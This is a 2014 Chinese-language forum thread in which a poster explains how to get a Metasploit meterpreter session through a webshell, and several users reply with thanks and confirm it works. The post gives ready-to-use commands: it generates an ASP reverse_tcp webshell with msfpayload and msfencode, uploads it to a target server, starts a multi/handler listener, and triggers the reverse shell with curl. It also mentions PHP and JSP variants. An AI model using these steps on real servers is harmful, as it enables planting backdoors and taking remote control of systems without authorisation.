凡火火。 发表于 2014-11-22 11:37:27

MSF通过shell获得session的方法

这是昨天渗透的时候遇到的问题 就简单整理了一下发出来。

Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,
一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,
幸运的话可以产生一个session,以便进一步利用。



下面是具体的利用方法。




我们可以通过指令查看msf里的payload 然后记住其位置:使用如下的指令来产生一个webshell,和前边将的msfpayload的用法类似,只不过这里生成的是一个网页脚本文件:
产生webshell

msfpayload windows/meterpreter/reverse_tcp LHOST=your_ip | msfencode -t asp -o webshell.asp

然后将此webshell上传到服务器(这个步骤要有上传权限。)
然后启动msfconsole

输入use exploits/multi/handler,
set PAYLOAD windows/meterpreter/reverse_tcp(这里的payload要和前边的msfpayload所使用的一样。
set LHOST your_ip,
执行exploit,
然 后访问webshell的url,这里使用curl 访问curl http://host/webshell.asp ,如果exploit执行成功的话就可以看到msfconsole中有返回meterpreter shell,如果meterpreter不会用网上查一下,很多。
但是我使用netbox 搭建asp环境老是执行出错,希望读者在实际验证不出错后再使用。
这里产生的是asp的webshell 也可以产生php webshell,jsp webshell 需要在msfencode时用-t 参数指定脚本类型,我认为php类型的webshell更容易成功。

C4r1st 发表于 2014-11-22 12:14:59

在12年的时候我也玩过Metasploit,应该是学过,好像看到过这样的文章,感谢分享。

zhoulevi 发表于 2014-11-22 13:02:50

非常谢谢

ll520 发表于 2014-11-22 15:01:43

已测试,就是菜刀的交互模式

a13775647904 发表于 2014-11-24 21:29:04

恩,我一直用的生成的exe,获取pc的meterpreter,没想到还能获取网站的
页: [1]
查看完整版本: MSF通过shell获得session的方法